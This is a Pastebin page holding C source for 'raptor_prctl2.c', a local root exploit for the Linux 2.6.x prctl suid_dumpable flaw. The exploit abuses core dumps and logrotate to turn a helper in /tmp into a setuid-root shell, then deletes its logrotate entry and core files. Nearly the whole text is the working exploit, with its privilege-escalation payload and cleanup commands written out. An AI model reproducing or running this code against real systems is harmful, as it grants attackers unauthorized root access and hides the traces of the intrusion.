Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <stdio.h>
- #include <unistd.h>
- #include <stdlib.h>
- #include <signal.h>
- #include <sys/stat.h>
- #include <sys/resource.h>
- #include <sys/prctl.h>
- #define INFO1 "raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)"
- #define INFO2 "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"
- char payload[] = /* commands to be executed by privileged logrotate */
- "\n/var/log/core {\n daily\n size=0\n firstaction\n chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/logrotate.d/core; rm -f /var/log/core*\n endscript\n}\n";
- char pwnage[] = /* build setuid() helper to circumvent bash checks */
- "echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c";
- int main(void)
- {
- int pid;
- struct rlimit corelimit;
- struct stat st;
- /* print exploit information */
- fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
- /* prepare the setuid() helper */
- system(pwnage);
- /* set core size to unlimited */
- corelimit.rlim_cur = RLIM_INFINITY;
- corelimit.rlim_max = RLIM_INFINITY;
- setrlimit(RLIMIT_CORE, &corelimit);
- /* let's create a fake logfile in /var/log */
- if (!(pid = fork())) {
- chdir("/var/log");
- prctl(PR_SET_DUMPABLE, 2);
- sleep(666);
- exit(1);
- }
- kill(pid, SIGSEGV);
- /* let's do the PR_SET_DUMPABLE magic */
- if (!(pid = fork())) {
- chdir("/etc/logrotate.d");
- prctl(PR_SET_DUMPABLE, 2);
- sleep(666);
- exit(1);
- }
- kill(pid, SIGSEGV);
- /* did it work? */
- sleep(3);
- if ((stat("/var/log/core", &st) < 0) ||
- (stat("/etc/logrotate.d/core", &st) < 0)) {
- fprintf(stderr, "Error: Not vulnerable? See comments.\n");
- exit(1);
- }
- /* total pwnage */
- fprintf(stderr, "Please wait until logrotate is run and check /tmp/pwned;)\n");
- exit(0);
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement